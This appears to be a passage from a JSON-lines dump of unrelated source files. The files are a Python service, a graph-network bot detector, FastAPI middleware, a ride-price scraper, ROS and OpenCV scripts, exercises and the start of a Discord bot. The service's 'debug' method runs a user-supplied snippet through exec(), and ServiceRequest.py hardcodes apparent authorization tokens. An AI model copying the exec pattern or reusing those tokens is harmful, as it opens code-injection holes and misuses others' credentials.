data)\n for r in result:\n r['created'] = r['created'].strftime(\"%Y-%m-%d %H:%M:%S\")\n return total, result\n\n def aggregate(self, data):\n \"\"\"\n # cascader: 按照element ui库cascader需要的数据格式返回数据。\n # 团队和项目配置数据不会特别多,因此无需过多关注性能。\n :param data:\n :return:\n \"\"\"\n if 'cascader' in data:\n cascader = {}\n _, results = self.db.search(\"environment\", \"team\", {})\n for result in results:\n if result['team'] not in cascader:\n cascader.setdefault(result['team'], {\n 'label': result['team'],\n 'value': result['team'],\n 'children': [{\n 'label': result['project'],\n 'value': result['project']\n }],\n })\n else:\n labels = [item['label'] for item in cascader[result['team']]['children']]\n if result['project'] not in labels:\n cascader[result['team']]['children'].append({\n 'label': result['project'],\n 'value': result['project']\n })\n return list(cascader.values())\n elif 'type' in data:\n collection = data.pop(\"type\", None)\n key = data.pop(\"key\", None)\n pipeline = [\n {'$group': {'_id': \"$\" + key}},\n ]\n result = self.db.aggregate(\"environment\", collection, pipeline)\n return result\n else:\n return []\n\n def debug(self, data):\n \"\"\"\n # 自定义关键字中提取函数名和参数,在后面拼接出调用请求,\n # 最后交给exec函数执行,如果提取函数名和参数失败则不处理。\n :param data:\n :return:\n \"\"\"\n mock = json.loads(data.get('mock'))\n snippet = data.get('snippet')\n func = re.findall(r'def\\s+(.+?):', snippet)\n if func:\n snippet += '\\n' + func[0]\n exec(snippet, {'data': mock})\n return mock\n\n def save(self, data):\n \"\"\"\n # 这里需要先提取函数名,然后关键字用函数名进行索引,存到数据库。\n # 如果数据库中函数名已经存在怎么办,是否需要先查询,重复则失败?\n :param data:\n :return:\n \"\"\"\n mock = json.loads(data.get('mock'))\n snippet = data.get('snippet')\n func = re.findall(r'def\\s+(.+?)\\(', snippet)\n name = func[0] if func else \"\"\n print({\n 'name': name,\n 'mock': mock,\n 'snippet': snippet,\n })\n result = self.db.insert(\"environment\", \"snippet\", {\n '_id': get_friendly_id(),\n 'name': name,\n 'mock': mock,\n 'snippet': snippet,\n })\n print(result)\n return result\n\n\nif __name__ == '__main__':\n service = Service()\n print(service.aggregate({'cascader': None}))\n","sub_path":"clover/environment/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"408474673","text":"import os\nimport numpy as np\nimport random\nimport torch\nfrom torch_geometric.nn import GCNConv,global_mean_pool,GATConv\nfrom torch_geometric.utils.convert import to_scipy_sparse_matrix\nimport torch.nn.functional as F\nimport networkx as nx\nfrom sklearn.preprocessing import normalize\nimport pickle\nimport math\nfrom collections import defaultdict\nfrom .SocialData import SocialBotDataset\nfrom sklearn import preprocessing\nfrom .utils import remove_self_loops\nfrom itertools import permutations\nrandom.seed(12345)\ntorch.manual_seed(12345)\n\nclass Net(torch.nn.Module):\n\tdef __init__(self, max_layer, node_dim, hid_dim, out_dim):\n\t\tsuper(Net, self).__init__()\n\t\ttorch.manual_seed(12345)\n\t\tself.hidden = []\n\t\tself.lin_res = torch.nn.Linear(node_dim, hid_dim)\n\t\tself.hidden.append(GCNConv(node_dim, hid_dim))\n\t\tfor i in range(max_layer-1):\n\t\t\tself.hidden.append(GCNConv(hid_dim, hid_dim))\n\t\tself.node_dim, self.hid_dim = node_dim, hid_dim\n\t\tself.fc1 = torch.nn.Linear(hid_dim, hid_dim)\n\t\tself.fc2 = torch.nn.Linear(hid_dim, hid_dim)\n\t\tself.pool = torch.mean\n\t\tself.attention = GATConv(hid_dim,hid_dim,heads=1,add_self_loops=True)\n\t\tself.lin = torch.nn.Linear(hid_dim, out_dim)\n\n\tdef forward(self, action, datas,all_features,indexes,k_hop_sg,device):\n\t\ttarget_feats = torch.FloatTensor(len(indexes), self.hid_dim).to(device)\n\t\tif len(indexes)==1:\n\t\t\tsub_graph_edge_index = [(0,0)]\n\t\telse:\n\t\t\tsub_graph_edge_index = list(permutations(range(len(indexes)), 2))\n\t\tsub_graph_edge_index = torch.tensor(sub_graph_edge_index,dtype=torch.long).t()\n\t\tfor i,(index,act2) in enumerate(datas):\n\t\t\tfeature_index, edge_index = k_hop_sg[act2][index.item()]\n\t\t\tfeatures = all_features[feature_index]\n\t\t\tedge_index = edge_index.to(device)\n\t\t\tx = features.to(device)\n\t\t\tx1 = F.dropout(F.relu(self.lin_res(x)),p=0.5, training=self.training)\n\t\t\tfor k in range(action+1):\n\t\t\t\tx = F.relu(self.hidden[k].to(device)(x,edge_index),inplace=True)\n\t\t\t\tx = F.dropout(x, training=self.training)\n\t\t\tx = F.dropout(F.relu(self.fc1(torch.add(x,x1))), training=self.training)\n\t\t\ttarget_feats[i] = self.pool(x, dim=0,keepdim=False) # [batch_size, hidden_channels]\n\n\t\ttarget_feats = self.attention(target_feats.to(device),sub_graph_edge_index.to(device))\n\t\ttarget_feats = self.lin(target_feats)\n\t\treturn F.log_softmax(target_feats, dim=1)\n\n\n\nclass gcn_env(object):\n\tdef __init__(self,\n\t\t\t\t dataset, folds,\n\t\t\t\t max_layer,\n\t\t\t\t max_width,\n\t\t\t\t hid_dim, out_dim,\n\t\t\t\t lr, weight_decay,\n\t\t\t\t device,\n\t\t\t\t policy=\"\",\n\t\t\t\t K=0):\n\t\tself.device = device\n\t\tself.max_layer = max_layer\n\t\tself.width_num = max_width\n\t\tself.load_social_dataset(dataset,K)\n\t\tself.train_num, self.val_num, self.test_num\\\n\t\t\t= len(self.train_indexes), len(self.val_indexes), len(self.test_indexes)\n\n\t\tself.batch_size = min(self.train_num,self.val_num,self.test_num)\n\t\tself.sg_num = self.dataset.data.y.shape[0]\n\t\tself.ini_k_hop_target_user(max_width)\n\t\tself.model = Net(max_layer, self.dataset.data.x.shape[-1], hid_dim, out_dim).to(device)\n\t\tself.optimizer = torch.optim.Adam(self.model.parameters(), lr, weight_decay=weight_decay)\n\n\n\t\tself.batch_size_qdn = math.ceil(self.train_num)\n\t\tself.policy = policy\n\t\tself.state_shape = self.dataset.data.x.shape\n\t\tself.baseline_experience = 100\n\t\tself.buffers = defaultdict(list)\n\t\tself.past_performance = [0]\n\t\tself.criterion = torch.nn.CrossEntropyLoss()\n\n\tdef ini_k_hop_target_user(self,max_hop):\n\t\tsp_adj = to_scipy_sparse_matrix(self.data.edge_index).tocsr()\n\t\tdd = sp_adj[:self.sg_num,:]\n\t\tself.target_user_k_adjs = []\n\t\ttarget_adj = dd[:, :self.sg_num]\n\t\ttarget_adj = target_adj.toarray()\n\t\ttarget_adj = normalize(target_adj, norm='l1', axis=1)\n\t\tself.target_user_k_adjs.append(target_adj)\n\t\tfor hop in range(max_hop-1):\n\t\t\tdd = dd * sp_adj\n\t\t\ttarget_adj = dd[:,:self.sg_num]\n\t\t\ttarget_adj = target_adj.toarray()\n\t\t\ttarget_adj = normalize(target_adj, norm='l1', axis=1)\n\t\t\tself.target_user_k_adjs.append(target_adj)\n\n\tdef load_social_dataset(self,dataset,K):\n\t\tprint(\"loading dataset\")\n\t\tmin_max_scaler = preprocessing.MinMaxScaler()\n\t\tself.dataset = SocialBotDataset(root=\"./data\", pre_transform=min_max_scaler.fit_transform,K=K)\n\t\tself.data = self.dataset[0]\n\t\tself.train_indexes, self.val_indexes, self.test_indexes,self.G = self.dataset.train_index,self.dataset.val_index,self.dataset.test_index,self.dataset.G\n\t\tself.k_hop_sg = [[] for i in range(self.width_num)]\n\t\tself.init_states = []\n\t\tself.all_target_index = list(range(len(self.dataset.data.y)))\n\t\tfilepath = os.path.join(\"data\",\"raw\",self.dataset.cur_dataset+str(self.width_num)+\"sub_g_features.pickle\")\n\t\tif os.path.exists(filepath):\n\t\t\twith open(filepath, 'rb') as f:\n\t\t\t\tself.init_states, self.k_hop_sg = pickle.load(f)\n\t\telse:\n\t\t\tfor item in self.all_target_index:\n\t\t\t\tprint(item)\n\t\t\t\tsub_graph = nx.ego_graph(self.G,item,radius=1,center=True,undirected=False)\n\t\t\t\tedges, feature_index, features = self.map_subgraph_into_new_nodes(sub_graph, include_features=True)\n\t\t\t\tinit_state = torch.mean(features, dim=0)\n\t\t\t\tself.init_states.append(init_state.numpy())\n\t\t\t\tself.k_hop_sg[0].append((feature_index, edges))\n\t\t\t\tfor i in range(1,self.width_num):\n\t\t\t\t\t\tsub_graph = nx.ego_graph(self.G, item, radius=i+1, center=True, undirected=False)\n\t\t\t\t\t\tedges, feature_index, features = self.map_subgraph_into_new_nodes(sub_graph, include_features=False)\n\t\t\t\t\t\tself.k_hop_sg[i].append((feature_index,edges))\n\t\t\twith open(filepath,'wb') as f:\n\t\t\t\tpickle.dump([self.init_states,self.k_hop_sg], f)\n\t\tself.init_states = np.array(self.init_states)\n\t\tprint(\"done!\")\n\n\tdef map_subgraph_into_new_nodes(self,G,include_features=False):\n\t\tnodes = G.nodes\n\t\tnodes_dict = { index:i for i, index in enumerate(nodes)}\n\t\tfeature_index = torch.tensor(list(nodes_dict.keys()),dtype=torch.long)\n\t\tedges = [(nodes_dict[edge[0]], nodes_dict[edge[1]]) for edge in G.edges]\n\t\tedges = np.array(edges).T\n\t\tedges = remove_self_loops(edges)\n\t\tedges = torch.tensor(edges, dtype=torch.long)\n\t\tif include_features:\n\t\t\tfeatures = self.data.x[feature_index]\n\t\t\treturn edges,feature_index,features\n\t\telse:\n\t\t\treturn edges,feature_index,None\n\n\n\tdef reset(self,train_gnn=False):\n\t\tstates = self.init_states[self.train_indexes]\n\t\tself.optimizer.zero_grad()\n\t\treturn states\n\n\tdef stochastic_k_hop(self, actions, index):\n\t\tnext_batch = []\n\t\ttarget_users = np.array([i for i in range(self.sg_num)])\n\t\tfor act, idx in zip(actions, index):\n\t\t\tprob = self.target_user_k_adjs[act][idx]\n\t\t\tprob = prob if np.sum(prob) > 0. else np.full(len(prob), 1. / len(prob))\n\t\t\tnext_target = np.random.choice(target_users, p=prob)\n\t\t\tnext_batch.append(next_target)\n\t\treturn next_batch\n\n\tdef step(self, actions):\n\t\taction1s = actions[0]\n\t\taction2s = actions[1]\n\t\tself.model.train()\n\t\tself.optimizer.zero_grad()\n\t\tindex = self.train_indexes\n\t\tdone = False\n\n\t\tfor act1,act2, idx in zip(action1s,action2s,index):\n\t\t\tself.buffers[act1].append((idx,act2))\n\t\t\tif len(self.buffers[act1]) >= self.batch_size_qdn:\n\t\t\t\tself.train(act1, self.buffers[act1])\n\t\t\t\tself.buffers[act1] = []\n\t\t\t\tdone = True\n\n\t\t# next states\n\t\tnext_batch_index = self.stochastic_k_hop(action2s, index)\n\t\tnext_states = self.init_states[next_batch_index]\n\t\tval_acc_dict = self.eval()\n\t\tval_acc = [val_acc_dict[a] for a in action1s]\n\t\tbaseline = np.mean(np.array(self.past_performance[-self.baseline_experience:]))\n\t\tself.past_performance.extend(val_acc)\n\t\treward = [100 * (each - baseline) for each in val_acc]\n\t\tr = np.mean(np.array(reward))\n\t\tval_acc = np.mean(val_acc)\n\t\treturn next_states, reward, [done] * len(next_states), (val_acc, r)\n\n\tdef train(self, act1, datas):\n\t\tself.model.train()\n\t\tindexes = []\n\t\tfor (index,act2) in datas:\n\t\t\tindexes.append(index)\n\t\tlength = len(indexes)\n\t\tnum_batches = math.ceil(length / self.batch_size)\n\t\tfor batch in range(num_batches):\n\t\t\ti_start = batch * self.batch_size\n\t\t\ti_end = min((batch + 1) * self.batch_size, length)\n\t\t\tpreds = self.model(act1, datas[i_start:i_end], self.data.x, indexes[i_start:i_end],\n\t\t\t\t\t\t\t\tself.k_hop_sg, self.device)\n\t\t\tlabels = torch.LongTensor(self.dataset.data.y[torch.LongTensor(indexes[i_start:i_end])]).to(self.device)\n\t\t\tself.criterion(preds, labels).backward()\n\t\t\tself.optimizer.step()\n\n\tdef eval(self):\n\t\tself.model.eval()\n\t\tbatch_dict = {}\n\t\tval_indexes = self.val_indexes\n\t\tval_states = self.init_states[self.val_indexes]\n\t\tval_act1s,val_act2s = self.policy.eval_step(val_states)\n\t\ts_a = zip(val_indexes, val_act1s,val_act2s)\n\t\tfor i, a1, a2 in s_a:\n\t\t\tif a1 not in batch_dict.keys():\n\t\t\t\tbatch_dict[a1] = []\n\t\t\tbatch_dict[a1].append((i,a2))\n\n\t\taccs = {a: 0.0 for a in range(self.max_layer)}\n\t\tfor act1 in batch_dict.keys():\n\t\t\tindexes = []\n\t\t\tfor (index,act2) in batch_dict[act1]:\n\t\t\t\tindexes.append(index)\n\t\t\tlength = len(indexes)\n\t\t\tcorrect = 0\n\t\t\tnum_batches = math.ceil(length / self.batch_size)\n\t\t\tfor batch in range(num_batches):\n\t\t\t\ti_start = batch * self.batch_size\n\t\t\t\ti_end = min((batch + 1) * self.batch_size, length)\n\t\t\t\tlogits = self.model(act1, batch_dict[act1][i_start:i_end], self.data.x, indexes[i_start:i_end],\n\t\t\t\t\t\t\t\t\tself.k_hop_sg, self.device)\n\t\t\t\tpreds = logits.argmax(dim=1)\n\t\t\t\tbatch_label = torch.LongTensor(self.dataset.data.y[torch.LongTensor(indexes[i_start:i_end])]).to(self.device)\n\t\t\t\tcorrect += int((preds == batch_label).sum()) # Check against ground-truth labels.\n\t\t\tacc = correct / length\n\t\t\taccs[act1] = acc\n\t\treturn accs\n\n\n\tdef test(self):\n\t\tself.model.eval()\n\t\tbatch_dict = {}\n\t\ttest_indexes = self.test_indexes\n\n\t\ttest_states = self.init_states[self.test_indexes]\n\t\ttest_act1s, test_act2s = self.policy.eval_step(test_states)\n\n\t\ts_a = zip(test_indexes, test_act1s,test_act2s)\n\t\tfor i, a1, a2 in s_a:\n\t\t\tif a1 not in batch_dict.keys():\n\t\t\t\tbatch_dict[a1] = []\n\t\t\tbatch_dict[a1].append((i,a2))\n\t\ttest_length = len(self.test_indexes)\n\t\tcorrect = 0\n\t\tfor act1 in batch_dict.keys():\n\t\t\tindexes = []\n\t\t\tfor (index,act2) in batch_dict[act1]:\n\t\t\t\tindexes.append(index)\n\t\t\tlength = len(indexes)\n\t\t\tnum_batches = math.ceil(length / self.batch_size)\n\n\t\t\tfor batch in range(num_batches):\n\t\t\t\ti_start = batch * self.batch_size\n\t\t\t\ti_end = min((batch + 1) * self.batch_size, length)\n\t\t\t\tlogits = self.model(act1, batch_dict[act1][i_start:i_end], self.data.x, indexes[i_start:i_end], self.k_hop_sg, self.device)\n\t\t\t\tpreds = logits.argmax(dim=1)\n\t\t\t\tbatch_label = torch.LongTensor(self.dataset.data.y[torch.LongTensor(indexes[i_start:i_end])]).to(self.device)\n\t\t\t\tcorrect += int((preds == batch_label).sum())\n\t\tacc = correct / test_length\n\t\treturn acc\n\n\n\n\n\n","sub_path":"RoGAS/model/gcn.py","file_name":"gcn.py","file_ext":"py","file_size_in_byte":10399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"155229149","text":"import time\n\nfrom fastapi import FastAPI, Request\nfrom starlette.middleware.base import BaseHTTPMiddleware\n\n\nclass PerformanceMonitoringMiddleware(BaseHTTPMiddleware):\n async def dispatch(self, request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers[\"X-Process-Time-MS\"] = str(\n round(process_time * 1000, 2)\n )\n return response\n","sub_path":"app/utils/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"50794726","text":"import requests\nimport json\nimport datetime\n\ndef get_price(diction):\n o_latitude = diction['o_latitude']\n o_longitude = diction['o_longitude']\n d_latitude = diction['d_latitude']\n d_longitude = diction['d_longitude']\n# TAPSI\n url = 'https://tap33.me/api/v2.1/ride/preview'\n header = {'content-type': 'application/json', 'x-authorization' : 'eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjoyNTY1OTMsInJvbGUiOiJQQVNTRU5HRVIiLCJjaXR5IjoiVEVIUkFOIiwiZGV2aWNlVHlwZSI6IldFQkFQUCJ9LCJpYXQiOjE1Nzk2MTU2MjMsImF1ZCI6ImRvcm9zaGtlOmFwcCIsImlzcyI6ImRvcm9zaGtlOnNlcnZlciIsInN1YiI6ImRvcm9zaGtlOnRva2VuIn0.Pjqcy14qLRbNE6IDbkCcxwBKXlo094SmakUmOCq04JFlq1Tvli7fyT1ZVSrTK3WgcqPI-09MzhruXU05YHneBg'}\n datas = {\"origin\":{\"latitude\":o_latitude,\"longitude\":o_longitude},\"destinations\":[{\"latitude\":d_latitude,\"longitude\":d_longitude}],\"hasReturn\":'false',\"initiatedVia\":\"WEB\"}\n tap30_sr = ServiceRequest(url, header, datas)\n price_tap30 = tap30_sr.tap30_price_checker()\n# SNAPP\n url = 'https://web-api.snapp.ir/api/v1/ride/price'\n header = {'authorization' : '24333bb925f41fc32ef10d99a5c5d3261579600718'}\n datas = {\"origin_lat\":o_latitude,\"origin_lng\":o_longitude,\"round_trip\":0,\"destination_lat\":d_latitude,\"destination_lng\":d_longitude}\n snapp_sr = ServiceRequest(url, header, datas)\n price_snapp = int(snapp_sr.snapp_price_checker()/10)\n\n print(\"2\")\n prices = {\"TAPSI\":price_tap30,\"SNAPP\":price_snapp}\n return prices\n\n\nclass ServiceRequest():\n def __init__(self, url, header, datas):\n self.url = url\n self.header = header\n self.datas = datas\n self.response_raw = requests.post(self.url, data = json.dumps(datas), headers = self.header)\n self.response_json = json.loads(self.response_raw.text)\n \n def snapp_price_checker(self):\n print(self.response_raw)\n return self.response_json['prices'][0]['final']\n \n\n def tap30_price_checker(self):\n print(self.response_raw)\n return self.response_json['data']['serviceCategoriesInfo'][0]['priceInfos'][0]['price']\n ","sub_path":"ServiceRequest.py","file_name":"ServiceRequest.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"285810522","text":"class State:\n def __init__(self):\n self.length = 0\n self.done = False\n self.data = []\n\ndef readBulk(b):\n s = b.Buffer()\n i = s.find('\\n')\n if i == -1:\n return None\n\n length = int(s[1:i-1])\n headerlen = i + 1\n bodylen = length + 2\n if b.Len() < headerlen + bodylen:\n return None\n\n b.Skip(headerlen)\n s = b.Read(bodylen)\n return s[:-2]\n\ndef readMessage(b, stat):\n if b.Len() == 0:\n return stat\n\n if stat.length == 0:\n s = b.Buffer()\n i = s.find('\\n')\n if i == -1:\n return stat\n\n s1 = b.ReadUtil('\\n')\n length = int(s1[1:i-1])\n stat.length = length\n\n while True:\n elem = readBulk(b)\n if not elem:\n break\n stat.data.append(elem)\n if len(stat.data) == stat.length:\n stat.done = True\n break\n\n return stat\n\ndef writeMessage(s):\n if not s:\n return '$-1\\r\\n'\n return '+%s\\r\\n'%(s)\n","sub_path":"epoll/resp.py","file_name":"resp.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"91711687","text":"#! usr/bin python3\n\nimport sys\n\nimport numpy as np\nfrom math import pi\nimport rospy\nfrom sensor_msgs.msg import JointState\nfrom actionlib.simple_action_client import SimpleActionClient \nfrom control_msgs.msg import FollowJointTrajectoryAction, FollowJointTrajectoryGoal\nfrom rospy.topics import Message\nfrom trajectory_msgs.msg import JointTrajectory,JointTrajectoryPoint\n\nfrom std_msgs.msg import Header\n\n\n\nclass run_dynamixel:\n def __init__(self):\n \n self.joints_str = JointTrajectory()\n self.joints_str.header = Header()\n self.joints_str.header.stamp = rospy.Time.now()\n self.joints_str.joint_names = ['pan3','pan']\n self.point = JointTrajectoryPoint()\n l3 = pi/180 * np.array([\n [0,30,45,0,-30,-50,-10,0],\n [0,30,45,0,-30,-50,-10,0]\n ])\n for indx in range(len(l3[0, :])):\n point= JointTrajectoryPoint(positions= l3[:, indx],\n time_from_start= rospy.Duration(0 + 0.5*indx))\n self.joints_str.points.append(point)\n print(str(self.joints_str.points)+ '\\n')\n def pub_position(self,arg):\n pub = rospy.Publisher('/dynamixel_workbench/joint_trajectory',JointTrajectory,queue_size=1)\n pub.publish(self.joints_str)\n # rospy.loginfo(\"command invaito: %s\", self.joints_str)\n \n def listener(self):\n rospy.Subscriber('/dynamixel_workbench/joint_states',JointState,self.pub_position)\n\n\nif __name__ == '__main__':\n try:\n rospy.init_node('pub_to_motor')\n r1 = run_dynamixel()\n r1.listener()\n rospy.spin()\n except KeyboardInterrupt as ke:\n pass\n\n ","sub_path":"src/testing_trajec.py","file_name":"testing_trajec.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"499308443","text":"def twosum(nums, target):\n n = len(nums)\n for i in range(n):\n for j in range(i+1,n):\n if nums[i] + nums[j] == target:\n return [i,j]\n\ndef twosum_v2(nums, target):\n d = {}\n for i in range(len(nums)):\n val = target - nums[i]\n if val in d:\n return [d[val], i]\n else:\n d[nums[i]] = i\n\nif __name__ == '__main__':\n print(twosum_v2([2, 7, 11, 15],9))\n print(twosum([2, 7, 11, 15],9))","sub_path":"Leetcode/TwoSums.py","file_name":"TwoSums.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"423378062","text":"import numpy as np\nimport cv2\nfrom collections import defaultdict\nfrom mean_shift_by_CV import get_img_hist\n\nBIN_SIZE = 2\nBIN_COUNTS = 183\n\n\ndef getColorList():\n \"\"\"\n get the range of each color\n :return: a list\n \"\"\"\n dict = defaultdict(list)\n\n lower_black = np.array([0, 0, 0])\n upper_black = np.array([180, 255, 46])\n color_list = []\n color_list.append(lower_black)\n color_list.append(upper_black)\n dict['black'] = color_list\n\n lower_gray = np.array([0, 0, 46])\n upper_gray = np.array([180, 43, 220])\n color_list = []\n color_list.append(lower_gray)\n color_list.append(upper_gray)\n dict['gray']=color_list\n\n lower_white = np.array([0, 0, 221])\n upper_white = np.array([180, 30, 255])\n color_list = []\n color_list.append(lower_white)\n color_list.append(upper_white)\n dict['white'] = color_list\n\n lower_red = np.array([156, 43, 46])\n upper_red = np.array([180, 255, 255])\n color_list = []\n color_list.append(lower_red)\n color_list.append(upper_red)\n dict['red'] = color_list\n\n lower_red = np.array([0, 43, 46])\n upper_red = np.array([10, 255, 255])\n color_list = []\n color_list.append(lower_red)\n color_list.append(upper_red)\n dict['red2'] = color_list\n\n lower_orange = np.array([11, 43, 46])\n upper_orange = np.array([25, 255, 255])\n color_list = []\n color_list.append(lower_orange)\n color_list.append(upper_orange)\n dict['orange'] = color_list\n\n lower_yellow = np.array([26, 43, 46])\n upper_yellow = np.array([34, 255, 255])\n color_list = []\n color_list.append(lower_yellow)\n color_list.append(upper_yellow)\n dict['yellow'] = color_list\n\n lower_green = np.array([35, 43, 46])\n upper_green = np.array([77, 255, 255])\n color_list = []\n color_list.append(lower_green)\n color_list.append(upper_green)\n dict['green'] = color_list\n\n lower_cyan = np.array([78, 43, 46])\n upper_cyan = np.array([99, 255, 255])\n color_list = []\n color_list.append(lower_cyan)\n color_list.append(upper_cyan)\n dict['cyan'] = color_list\n\n lower_blue = np.array([100, 43, 46])\n upper_blue = np.array([124, 255, 255])\n color_list = []\n color_list.append(lower_blue)\n color_list.append(upper_blue)\n dict['blue'] = color_list\n\n lower_purple = np.array([125, 43, 46])\n upper_purple = np.array([155, 255, 255])\n color_list = []\n color_list.append(lower_purple)\n color_list.append(upper_purple)\n dict['purple'] = color_list\n\n return dict\n\n\ndef hsv_to_bin(scale):\n \"\"\"\n 给定一个色块的色度, 计算他所属的bin, 例如:[0,10)属于bin(0), [10,20)属于bin(1)\n :param scale: 一个色块的值\n :return: 当前色块属于哪个bin\n \"\"\"\n name = ''\n flag = None\n h, s, v = scale\n if v <= 255*0.2:\n name = '黑色' # 底部是黑色\n flag = 180\n elif s <= 255*0.2: # 靠近柱中心是白色或灰色\n if 255*0.2< v <= 255*0.6: # 靠中间是灰色\n name = '灰色'\n flag = 181\n elif v > 255*0.6:\n name = '白色' # 靠上是白色\n flag = 182\n\n else: # 彩色\n hue = h//4 # (0-45)\n flag = hue\n\n if 255*0.2 < s <= 255 * 0.6: # 内层\n horizontal = 0\n elif s > 255 * 0.6: # 外层\n horizontal = 1\n flag += 45\n\n if v > 255*0.6: # 上层\n vertical = 3\n elif 255*0.2 < v <= 255*0.6: # 上层\n vertical = 3\n flag += 45\n\n\n name = str(hue)+'_'+str(horizontal)+'_'+str(vertical)\n\n return [name, flag]\n\n\ndef scale_to_bin(scale):\n \"\"\"\n 给定一个色块的色度, 计算他所属的bin, 例如:[0,10)属于bin(0), [10,20)属于bin(1)\n :param scale: 一个色块的值\n :return: 当前色块属于哪个bin\n \"\"\"\n\n b = np.mean(scale)//BIN_SIZE\n return b\n\n\ndef get_points_of_bin(img, bin_num):\n \"\"\"\n 根据给定图像, 计算属于某个bin的所有点的位置\n :param img: 给定图像\n :param bin_num: bin_num\n :return: 返回一个[n, 2]的列表, 包含所有属于某个bin的所有的点\n \"\"\"\n result = np.array(np.where(img == bin_num)).T\n return result\n\n\ndef compute_histogram(img):\n \"\"\"\n 给定target的图像, 计算q_u, 灰度值越高, 色块越白\n calculate the frequency of every bin(with weight)\n :param img: 给定\n :return:\n \"\"\"\n # img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n img_hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n # get a kernel with weight\n kx = cv2.getGaussianKernel(img.shape[1], 3) # 行数(个数, sigma)\n ky = cv2.getGaussianKernel(img.shape[0], 3) # 列数\n kernel = np.matmul(kx, ky.T)\n kernel = np.ones([img.shape[1], img.shape[0]])\n\n # 计算每个bin的概率\n # calculate the frequency of every bin\n\n # 将图片转为bin图\n for x in range(img.shape[0]):\n for y in range(img.shape[1]):\n name, flag = hsv_to_bin(img_hsv[x][y])\n img[x][y] = flag\n\n q_u_list = np.array([])\n for bin_num in range(0, BIN_COUNTS):\n # 获得所有属于某个bin的所有点的坐标\n # get all point coordinate of one bin\n points_list = get_points_of_bin(img, bin_num)\n\n # calculate all the sum of all the points\n _sum = np.sum([kernel[x][y] for y, x in points_list])\n q_u_list = np.append(q_u_list, _sum)\n\n # normalize, make the sum 1\n # q_u_list = q_u_list/np.sum(q_u_list)\n\n return q_u_list\n\n\ndef compute_histogram1(img):\n \"\"\"\n 给定target的图像, 统计出现次数, 灰度值越高, 色块越白\n count the frequency of each bin\n :param img: 给定\n :return:\n \"\"\"\n # img1 = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n cv2.imshow('img', img)\n cv2.waitKey(0)\n cv2.destroyWindow('img')\n\n q_u_count_list = np.array([])\n for bin_num in range(0, BIN_COUNTS):\n # 获得所有属于某个bin的点的坐标\n points_list = get_points_of_bin(img, bin_num)\n\n count = len(points_list)\n q_u_count_list = np.append(q_u_count_list, count)\n\n q_u_count_list = q_u_count_list/np.sum(q_u_count_list)\n\n return q_u_count_list\n\n\nif __name__ == \"__main__\":\n\n img = cv2.imread('data/test1_1.png')\n hist = compute_histogram(img)\n # hist = compute_histogram_count(img)\n print(hist)\n\n # cv_hist = get_img_hist(img)\n # print(cv_hist.T)\n\n","sub_path":"calHistogram.py","file_name":"calHistogram.py","file_ext":"py","file_size_in_byte":6514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"501480503","text":"\"\"\"\n#1 assignment\ndef divisible(x, y):\n\tif x % y == 0:\n\t\treturn True\n\telse:\n\t\treturn False\n\"\"\"\n\"\"\"\n#2 assignment\ndef cent_change(cents):\n\tdollars = cents // 100\n\ta = cents % 100\n\tquarters = a // 25\n\tb = a % 25\n\tdimes = b // 10\n\tc = b % 10\n\tnickels = c // 5\n\td = c % 5\n\tpennies = d\n\"\"\"\n\"\"\"\n#3 assignment\ndef fibonacci():\n\ta = 0\n\tb = 1\n\tfor i in range(1, 20):\n\t\tc = a + b\n\t\ta = b\n\t\tb = c\n\t\tprint(a)\t\t\nfibonacci()\n\"\"\"\n\n#4 assignment\ndef int_check(user_input):\n\twhile True:\n\t\tif user_input.isdigit():\n\t\t\treturn(int(user_input))\n\t\telse:\n\t\t\tuser_input = input(\"This is not a numeral value for your input. Try again. \")\n\n\ndef factorial(number):\n\ta = number\n\tb = number - 1\n\tfor cat in range(1, number):\n\t\tc = a * b\n\t\ta = c\n\t\tb = b - 1\n\treturn(a)\n\t\n\ndef calculating_e():\n\ta = 1\n\tfor yowl in range(1, 20):\n\t\ta += 1 / factorial(yowl)\n\treturn(a)\n\n\npurr = input(\"Input a number. \")\nmeow = int_check(purr)\nprint(factorial(meow))\nprint(calculating_e())\n","sub_path":"optional_assignments.py","file_name":"optional_assignments.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"537598415","text":"from discord.ext import commands\nimport discord\nfrom mcstatus import MinecraftServer\nimport socket\nfrom pyraklib.protocol.EncapsulatedPacket import EncapsulatedPacket\nfrom pyraklib.protocol.UNCONNECTED_PING import UNCONNECTED_PING\nfrom pyraklib.protocol.UNCONNECTED_PONG import UNCONNECTED_PONG\nimport aiohttp\nimport base64\nimport json\nimport asyncio\nfrom random import choice\n\n\nclass Minecraft(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n self.ses = aiohttp.ClientSession()\n\n self.g = self.bot.get_cog(\"Global\")\n\n self.first = [\"Hey, you should build\", \"Hey, what if you made\", \"Hey, you should build\", \"What if you built\", \"What if you made\", \"You could create\", \"What if you created\", \"You could make\"]\n self.prenouns = [\"a statue of a creeper\", 